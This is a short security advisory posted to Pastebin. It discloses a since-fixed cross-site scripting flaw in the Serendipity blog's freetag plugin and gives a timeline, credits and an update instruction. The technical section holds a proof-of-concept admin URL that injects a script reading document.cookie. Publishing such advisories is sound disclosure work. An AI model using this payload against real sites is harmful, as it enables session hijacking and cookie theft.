Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Advisory: Serendipity freetag plugin 'serendipity[tagview]' Cross-Site Scripting vulnerability
- Advisory ID: SSCHADV2011-016
- Author: h4(k3r
- Affected Software: Successfully tested on Serendipity 1.5.5
- Vendor URL: http://h4ck3r.ze-forum.com
- Vendor Status: fixed
- CVE-ID: -
- ==========================
- Vulnerability Description:
- ==========================
- The freetag plugin parameter "serendipity[tagview]" in Serendipity backend is prone to a Cross-Site Scripting vulnerability
- ==================
- Technical Details:
- ==================
- http://<target>/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=managetags&serendipity[tagview]=<script>alert(document.cookie)</script>
- =========
- Solution:
- =========
- Update to the latest version
- ====================
- Disclosure Timeline:
- ====================
- 22-Sep-2011 - informed developers
- 23-Sep-2011 - fixed in the latest version
- 25-Sep-2011 - release date of this security advisory
- 25-Sep-2011 - post on BugTraq
- ========
- Credits:
- ========
- Vulnerability found and advisory written by Stefan Schurtz.
- ===========
- References:
- ===========
- http://h4ck3r.ze-forum.com
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement